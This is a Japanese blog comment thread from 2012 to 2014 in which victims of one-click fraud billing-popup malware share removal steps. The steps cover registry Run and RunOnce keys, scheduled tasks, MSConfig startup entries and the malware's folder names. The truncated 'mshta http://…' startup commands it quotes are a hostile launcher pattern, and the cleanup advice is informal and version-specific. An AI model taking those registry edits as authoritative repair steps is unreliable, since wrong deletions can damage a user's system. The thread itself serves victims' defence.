    [ 2012/04/13 02:46 ] [ 編集 ]
    未だに不正請求なんてしてる人がいたんですねぇ。
    こちらのサイトのおかげで削除できました。月桂樹葉さん、りっくさん、ありがとうございました。すっきりしました^^
    [ 2012/06/29 01:43 ] [ 編集 ]
    不正請求は、まだまだあるみたいですね。
    すっきりされて何よりですヽ(゜▽゜*)
    [ 2012/06/29 14:17 ] [ 編集 ]
    エロムービーというサイトにやられました。
    【駆除方法1】で、そのまんまの文字列を発見したのですが解決せず、【駆除方法2】で、SystemBootとRegWriteというファイル(作成日時と感染日時が一致)をフォルダから出したら請求画面が消えました。
    丁寧に説明していただいて、どうもありがとうございました。
    ところで、請求画面の問題は解決したのですが、他のウイルスに感染している可能性はありますか?
    ウイルスセキュリティでは大丈夫なようですが・・・。
    不躾な質問で申し訳ございませんが、回答よろしくお願いします。
    [ 2012/07/04 19:01 ] [ 編集 ]
    新しい対処法のご報告ありがとうございました v-237

    セキュリティソフトでも100%とはいきませんが、
    セキュリティソフトで完全スキャンすれば、
    ほとんど大丈夫と考えてよいのではないのでしょうか。
    [ 2012/07/04 19:36 ] [ 編集 ]
    早速の回答、どうもありがとうございました。
    しばらくは一抹の不安が残る思いますが、一安心しました。
    今後は気を付けます・・・。

    ところで、【駆除方法2】にあるタスクTabの確認ができませんでした(Vistaです)。今回は作成日時と感染日時が一致していたので気づきましたが。今後のためにも、確認方法を教えて下さい。
    [ 2012/07/04 22:10 ] [ 編集 ]
    お返事は、仕事の都合によって、
    早いときもあれば、全くできないときもありますので、悪しからず。

    実は、当方はXPと7しか持っておらず、Vistaの場合は、検証できていません。
    きっとVistaの方はわかりにくいところもあるでしょう。すみません。

    Vistaの場合【駆除方法2】にあるタスクの確認は
    http://windows.microsoft.com/ja-JP/windows-vista/Schedule-a-task
    の記事がお役に立つのではないかと思います。
    Windows7に近いのではないでしょうか。
    家族がVistaを持っているのですが、なかなか使わせてくれません( ┰_┰)
    [ 2012/07/04 22:33 ] [ 編集 ]
    ワンクリック詐欺に合いまして
    どうやって消せるのか調べてたら

    偶然このサイトを見かけて試してみました!
    マイコンピューター\HKEY_USER\(各ユーザー)\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

    自分はこれで最後に.htaが付くものを発見し、それを削除して
    再起動したらその後出なくなりました。
    本当に助かりました
    ありがとうございます!
    [ 2012/07/19 17:39 ] [ 編集 ]
    その方法で消えるワンクリック詐欺もまだまだあるのですね。
    ご報告、ありがとうございましたv-162
    [ 2012/07/21 17:37 ] [ 編集 ]
    請求の画面は消えたんですが、再起動したらパソコンがおかしくなりました。インターネットに接続できなくなり困っています。。。
    [ 2012/08/07 14:49 ] [ 編集 ]
    情報が少ないのでいろいろな場合が考えられます。
    プロバイダがOCNのようですので
    電話サポート
    0120-047-860
    に相談するのが確実でしょう。
    受付時間 10:00~19:00
    (土日祝日含、年末年始は除きます)
    [ 2012/08/07 17:52 ] [ 編集 ]
    ワンクリック不正請求詐欺にひっかかりググった
    ところここに辿りつきました。

    PCに詳しくない私の場合下記に 
    mshta.exe http://…最後に .htaがつかないキーを
    見つけ削除するのですが、再起動するとまた会費請
    求画面が現れハマッテました。
    削除したはずのキーも再起動後に復活しているのです・・・。

    \HKEY_CURRENT_USER\SOFTWARE\Microsoft\
    Windows\CurrentVersion\Run
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
    Windows\CurrentVersion\Run

    悪さをしているファイルがあるんだろうと思い いろ^2
    探してみましたが見つかりません。

    最終的に

    Runと同じ階層のRunOnceが気になっていたので
    中を確認するとmshta.exe http://…があり削除する
    ことで会費請求画面があらわれなくなりました。

    自動的に実行されるのはRunキーだけだと思い込んで
    ました。
    [ 2012/08/16 04:21 ] [ 編集 ]
    新しい情報ありがとうございました。
    ご丁寧に二段構えになっていたわけですね。
    他の方のお役にも立つことと思います!
    [ 2012/08/16 17:40 ] [ 編集 ]
    私のPC(Windowns7)もワンクリック詐欺にあい、対応策を探していてここに行き当たりました。
    ……ですが駆除方法1で、該当のものを削除してポップアップを消しても、
    数分後にはまた現れてレジストリにも先ほど削除した定義が
    書かれていました。(再起動しても同じ)

    それ以降も探していたら、タスクスケジューラーにジョブが
    登録されていて操作にmshta http://~ といった内容が
    書かれていました。
    そのジョブを削除したら以降でなくなりました。
    登録内容をよく見ず削除したのですが、数分おきに起動するよう登録されていたようです。

    上手く説明できず申し訳ありませんが、困った時にこのサイトが凄く助けになりましたので、
    何か力になれたらと思い記載しました。
    [ 2012/11/11 00:00 ] [ 編集 ]
    コメントありがとうございました。
    お役に立てたということで、たいへん嬉しいです。

    駆除方法2のwindows7のやり方で捜したら、そういう記述があったということでしょうか。
    それとも、違う方法ですか。
    同じ方法で捜したら、タスクスケジューラーにジョブが登録されていて
    操作にmshta http://~ といった内容が書かれていたら、
    それを削除すればいいという補足をしていただいたと解釈してよろしいでしょうか。
    [ 2012/11/11 01:31 ] [ 編集 ]
    説明不足で申し訳ありません。
    駆除方法2の記載を図解入りで書いてあるサイトが有り、
    その方法から削除しました。

    ↓コチラの◆タスクスケジューラの削除手順です。
    http://esupport.trendmicro.co.jp/pages/JP-2079467.aspx

    手順が載っていて、確認ポイントが分かり易くて削除まで
    至りました。

    月桂樹葉さんのサイトで概念を勉強させていただいた
    それをヒントに他のサイトを見ても意味合いが分かるようになり
    削除方法を見つけることができました。
    改めて、ありがとうございます。

    相手も手口を変えてきているので、知っている情報を
    公開していただける事は私の様な素人には助かります。

    [ 2012/11/11 22:50 ] [ 編集 ]
    ごろさん

    たいへんわかりやすい情報をありがとうございました。
    トレンドマイクロ社にはこのサイトの情報を送ったこともあります。
    たいへん、熱心に不正請求詐欺に取り組んでくれている会社だと思います。

    早速、駆除方法2にその情報を加えたいと思います。
    被害者の方の力になる情報をお知らせいただき、こちらこそありがとうございました。
    [ 2012/11/13 20:28 ] [ 編集 ]
    とても魅力的な記事でした!!
    また遊びに来ます!!
    ありがとうございます。。
    [ 2012/12/25 15:23 ] [ 編集 ]
    どうも~♪
    [ 2012/12/26 23:19 ] [ 編集 ]
    12月28日眠れぬまま深夜1時インターネットを閲覧していてアヅルトサイトに行き着き不用意にクリックしてしまい不当な料金請求の画面が現れ困ってしまいました。勿論料金を支払う気は全くありませんが画面を消しても10秒毎に画面が現れ削除方法を探しているとこのサイトを発見いたしました。駆除方法を色々トライしてみましたが上手くゆきませんでした。といいますのもmshta.exeや.hta
    やmsconfig.exe regedit.exeでPGMやファイルを検索しても該当するものは出てきませんでした。
    最近のアダルトサイトは実に巧妙に実行ファイルを忍び込ませているのですね。そこでやむなくシステムの復元にトライしました。
    IPAのWIN7の復元マニュアルに従って復元したところアダルトの請求画面は消えました。どうしてもうまくゆかない時トレンドマイクロの有料メンテを使わなければと思っていましたが復元処置で何とか対応できました。本当に有難うございました。今回の経験を生かして軽々にクリックすることはしないようにいたします。
    [ 2012/12/29 21:30 ] [ 編集 ]
    果敢にいろいろ挑戦する気力が、素晴らしいです!
    安心して新しい年を迎えられますねv-218
    [ 2012/12/30 04:08 ] [ 編集 ]
    不注意でクリックしてしまったアダルトサイトで被害にあい、表示されないようにするための情報を探していました。
    こちらのサイトを見つけ、早期対応する事が出来ました。

    私の場合は、OSはWindows7で、駆除方法1のレジストリ削除方法と、駆除方法2のタスクスケジューラ削除を実行して対応できました。
    レジストリでは、「mshta http://… php? …」タイプで登録されていました。
    「mshta」でレジストリ内を検索したところ、いけ さんがコメントしていた「RunOnce」の中にもあったので削除しました。

    大変助かりました。ありがとうございます。
    [ 2013/01/05 04:54 ] [ 編集 ]
    記事のすみずみまで読んでいただけたのですね。
    とても嬉しいです。
    コメントありがとうございました。
    [ 2013/01/06 02:22 ] [ 編集 ]
    初めて見たサイトで見事にひっかかってしまい、SEの旦那に相談するのも
    こっ恥ずかしく、自分で対応する事に。

    このブログがなければできませんでした。ありがとうございました。

    駆除方法1の通り、レジストリ内の全てのRunのmshta htaが含まれるものを

    削除、スタートアップの再設定で元に戻りました!

    本当にありがとうございました。結局、あまりに嬉しかったので旦那に報告してしまいました。

    それにしても、巧妙な手口で感心してしまいました。

    「利用規約」なるものが一見、背景のように薄く小さい文字でかすかに書かれていたらしいのですが・・

    見えんわ!!
    [ 2013/01/24 10:06 ] [ 編集 ]
    かわいいガンバリ奥様ですねv-119
    コメントありがとうございました。
    [ 2013/01/24 23:46 ] [ 編集 ]
    こちらの情報を参考に
    知人の依頼を何件も処理させていただいてます。

    先のいけ様のコメントにありました

    >PCに詳しくない私の場合下記に 
    mshta.exe http://…最後に .htaがつかないキーを
    見つけ削除するのですが、再起動するとまた会費請
    求画面が現れハマッテました。
    削除したはずのキーも再起動後に復活しているのです・・・。

    \HKEY_CURRENT_USER\SOFTWARE\Microsoft\
    Windows\CurrentVersion\Run
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
    Windows\CurrentVersion\Run

    悪さをしているファイルがあるんだろうと思い いろ^2
    探してみましたが見つかりません。

    最終的に

    Runと同じ階層のRunOnceが気になっていたので
    中を確認するとmshta.exe http://…があり削除する
    ことで会費請求画面があらわれなくなりました。



    先日これと同様の症状がありました。
    ただ今回処理したパターンでは再起動後また広告が復活してしまいました。
    msconfigのスタートアップにおいてもチェックボックスが外してあるだけで値は残っていました。(チェックボックスを外して広告を消してもあらたに同じスタートアップが別名で勝手に作成されました)

    そこでファイルのデータに記述のあったキーワード
    php?を再度レジストリで検索をかけたところ
    HKEY_LOCAL_MACHINESOFTWAREMicrosoftSharedToolsMSConfigstartupreg
    の階層に
    RegWritezn****(英数の羅列)と
    SystemBootzn****(同じ英数)の二つのフォルダを発見しました。

    \HKEY_CURRENT_USER\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run
    の場所では名前がRegWritezn****とSystemBootzn****の二種類出ていたのでコレだと思い削除(データの値は広告アドレスでした)

    最終的に
    ①\HKEY_CURRENT_USER\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run
    ②\HKEY_CURRENT_USER\SOFTWARE\Microsoft\ Windows\CurrentVersion\Runonce
    ③HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SharedTools\MSConfig\startupreg\RegWritezn
    ④HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SharedTools\MSConfig\startupreg\SystemBootzn

    の合計4箇所にあったデータを削除しました。
    大本がスタートアップだったのでRUNの場所でファイルを削除しても新しい値がまた入力されるというもののようです。

    以上ご参考までに。

    ありがとうございます。いつも助かってます。
    [ 2013/02/02 14:54 ] [ 編集 ]
    かんま様

    詳細なご報告ありがとうございました。
    良くつきとめてくださいました!!

    初心者には歯が立たないとは思いますが、
    よく読んで確信が持て、自己責任でできる上級者には役立つ情報になると思います。

    詳しく、ていねいな情報を本当にありがとうございました。
    複雑になってきて、削除するほうもたいへんです。
    お知り合いの方の依頼を何件も処理されているということですが、
    それだけ、皆さんに頼られている方なのですね。

    すべてのウィルス対策ソフトで阻止できる方法があると良いですね。
    [ 2013/02/03 00:35 ] [ 編集 ]
    レジストリ、タスクスケジューラ、スタートアップの対応をしても解決せず、
    こちらで書かれているダンプ法で解決しました。
    windows7です。
    ワンクリ詐欺ツールの本体は
    C:\ProgramData\galan
    にありました。
    ありがとうございました。
    [ 2013/06/20 03:01 ] [ 編集 ]
    猛毒きのこさんの最終コメントに載っているやり方ですね!ご報告ありがとうございました。
    [ 2013/06/20 03:47 ] [ 編集 ]
    レジストリ削除の時点で直りました。
    わかりやすい説明ありがとうございます。
    [ 2013/08/18 22:39 ] [ 編集 ]
    素直な(?)請求画面でよかったですねv-221
    [ 2013/08/19 00:27 ] [ 編集 ]
    上記「かんま」さんの手順で完了しました。
    女房や子供にバレないように深夜にこのサイトを見つけ実行!
    下の対策コメントを読まずに一番上にある初期の対策を一生懸命・・・何度やっても出てくるお化け。
    翌日、下にある最近のコメントに気付き「かんま」さんの対策を見つけ実行!!
    やっと成仏してくれました。
    [ 2013/09/11 20:55 ] [ 編集 ]
    深夜にがんばっているもっちパパが目に浮かびます。
    かんまさんと同じ症状だったのですね。
    ママやお子様にバレずにバンザーイ♪ヽ(゜▽゜*)ノ
    [ 2013/09/11 22:00 ] [ 編集 ]
    旦那さんが引っかかり、このサイトのおかげで何とか消すことが出来ました!ありがとうございましたm(__)m
    [ 2014/02/02 16:38 ] [ 編集 ]
    良い奥様ですねv-218
    [ 2014/02/03 04:01 ] [ 編集 ]
    何度も何度も数時間かけて試行錯誤しても駄目で、なきそうだったけど、かんまさんの書き込みのとおりやったら直りました。

    ①\HKEY_CURRENT_USER\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run
    ②\HKEY_CURRENT_USER\SOFTWARE\Microsoft\ Windows\CurrentVersion\Runonce
    ③HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SharedTools\MSConfig\startupreg\RegWritezn
    ④HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SharedTools\MSConfig\startupreg\SystemBootzn

    この4箇所を上の本文にも載せたほうがいいと思います

    それにしても非常に非常にひじょーに助かりました
    ありがとうございます!!!
    [ 2014/03/13 11:11 ] [ 編集 ]
    早速、本文に載せました。
    ご指摘ありがとうございました!
    [ 2014/03/15 03:33 ] [ 編集 ]
    上記の削除方法とは、起動すると自動的に立ち上がるようになっていたので、起動時に立ち上げるファイルを表示させて、怪しいものの中から見つけました。これを起動にスタートしなくなるようにこのメニューから削除するだけで、停止します。後は、ゆっくり犯人を特定すれば済みました。また、当日にダウンロードしたファイルからもフォルダーを特定することができました。インストール先は、XPですが、DOCUMENT and Setting>ALL Users>nxspmのフォルダーでした。nxspmというフォルダーの名前はふざけてますね。記憶ちがいかもしれまんがこの中に、70672703というファイルが起動ファイルだったのでしょうか。フォルダーの中に起動ファイルの他に、水着の女の写真のファイルやら時間を計測するファイルなどがありました。起動ファイルだけ削除すれば、止まるのですが、気分が悪いので、起動ファイルだけでなく、写真ファイル含めすべて削除しました。
    [ 2014/03/27 18:27 ] [ 編集 ]
    詳しい説明ありがとうございました。
    全部消してスッキリですねv-221
    [ 2014/03/27 19:57 ] [ 編集 ]
    は、去年の話でしょうか?

    キー名
    HKEY_CURRENT_USER/Software/Webnxspm
    値の名前(N): userid
    値のデータ(V): 70672703

    キー名
    HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run
    値の名前(N): webnxspm
    値のデータ(V): "C:Documents and Settings/All Users/Application Data/nxspm/70672703"


    [ 2014/03/29 00:35 ] -の訂正用

    Vistaでは、
    →HKEY_CURRENT_USER/SOFTWARE/Microsoft/Windows/CurrentVersion/Run
    値の名前(N): ********

    修正しました
    [ 2014/03/28 01:24 ] [ 編集 ]
    > は、去年の話でしょうか?
    pochiさんに聞かないとわかりませんが、最近の話のようですね。
    去年から出回っていたのですね。

    pochiさんの現象を解説いただき、ありがとうございます(^^)
    [ 2014/03/28 03:02 ] [ 編集 ]
    昨年のことか一昨年のことです。夜中に酔っていろいろなサイトを開いていたらこんなことになってしまい恥ずかしい限りです。当時、このサイトを見つけ、朝までになんとか解決しました。ありがとうございました。
    閉じても勝手に一定時間ごとに開くので、LANケーブルを外して再起動しましたが、やはり起動すると開くので、ソフトがPC内部にインストールされたと分かりました。私はPCに詳しくないのですが、再起動して何もしないのに開くということは、起動時にスタートするプログラムに指定されているということだと思い、ネットで起動時にスタートするプログラムの一覧を出す方法と削除の方法を調べて解決しました。再起動時にスタートさえしなければ、後はあせらずにゆっくり犯人を割り出して削除すればいいわけです。同時に、その日にインストールないしダウンロードしたファイルを調べる方法も使い特定したような気がします。だいぶ以前のことですが、当時のメモが残っていたので、犯人のホルダーの場所と名前が残っていたので、記載させていただきました。請求会社の名称そのものか略称がNXだった記憶で、NXのスパムファイルとはふざけた名前のホルダー、ファイルだと印象に残っていたのです。水着のお姉ちゃんのJPEG?ファイルは記念に残しておいてもよかったかもしれません(笑)
    [ 2014/03/29 08:17 ] [ 編集 ]
    当時のメモが出てきて、当時のことを思い出し、まだ被害が発生しているようなので書き込みしました。当時はここの書き込みが1年ほど納まっていたので、もう過去のこことになっているのかと思い、書き込みはしませんでした。
     当時、こちらの方法に従い、mshta hta を削除したのですが、いつの間にかまた再生されているのです。再起動するとか、一定時間が経つとかは、たぶん後者だったような気がしますが、どうも新種の奴だったので、mshta htaの削除だけではだめだったようです。今思い出したのですが、2つのフォルダーを削除したような記憶があるので、実行ファイルがあるフォルダーとそれとな全然別な場所に、mshta htaを再生させるフォルダーが格納されていたのではないでしょうか?
     請求額は3万だか7万だったかの記憶ですが、会社のPCモニターだった場合は会社にばれるとまずいという気持ちから、これぐらいだったら支払ってもいいかと思い、相手先に連絡して支払ってしまう人もいますが、それをすると大変なことになります。恥ずかしながら、私は法律の仕事をしているので実際に目にしているのですが、ワンクリック詐欺に限らず不正請求(というかすべての詐欺は)は、すべて3万円程度から始まり、ひっかかった人間(カモ)から取れるこことまで絞り取ろうとするので、数百万円まで行く事例はざらにあります。絶対に支払ってはならないし、支払ったら自分の身元が亜相手にばれるので、さらに被害が拡大してしまいますよ!
    [ 2014/03/29 08:46 ] [ 編集 ]
    やはり、以前の話だったのですね。

    体験談および法律関係者としてのお話ありがとうございます。
    絶対に払ってはならない、というのは鉄則ですねv-237
    [ 2014/03/29 13:42 ] [ 編集 ]
    名無しさんから、以下のコメントをいただきました。

    > >bg.jpgのファイルを移動したら、暫くして消えました。
    > >エラーになったかも?
    > >[ 2011/09/18 15:45 ] hiro
    >
    > →d.bat が、作成されてファイルの一部もしくは全部が、消滅します。
    >
    > bg.jpgのファイルを移動しない時には、
    >
    > vsint nxmer nxspm lkpns lktoy lksxy lkgol rroll suns4 等では、
    > 日付を一週間先に変更
    >
    > galan lfmay padpd では、日付を10日先に変更し
    >
    > 右上の、X でポップアップを閉じれば
    >
    > →HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun
    > 値の名前(N): ********
    >
    > まで 消滅します。
    >
    > 再起動して日付を戻してください。
    >
    >
    > 今年は、 以下のサイトでこの手法を確認しています。
    >
    > エロ MAX TV 
    > suns4 websuns4
    >
    > マスト 
    > lfmay weblfma
    >
    > COOKIE 
    > padpd webpadpd

    名無しさんは、業界の方でしょうか。
    また新しい解説を詳しくしていただき、ありがとうございました!

    以前から危ないサイトのURLは載せないことにしていますので、
    失礼ですが、その部分を編集させていただきました。
    [ 2014/03/29 14:02 ] [ 編集 ]
    コメントの投稿













    管理者にだけ表示を許可する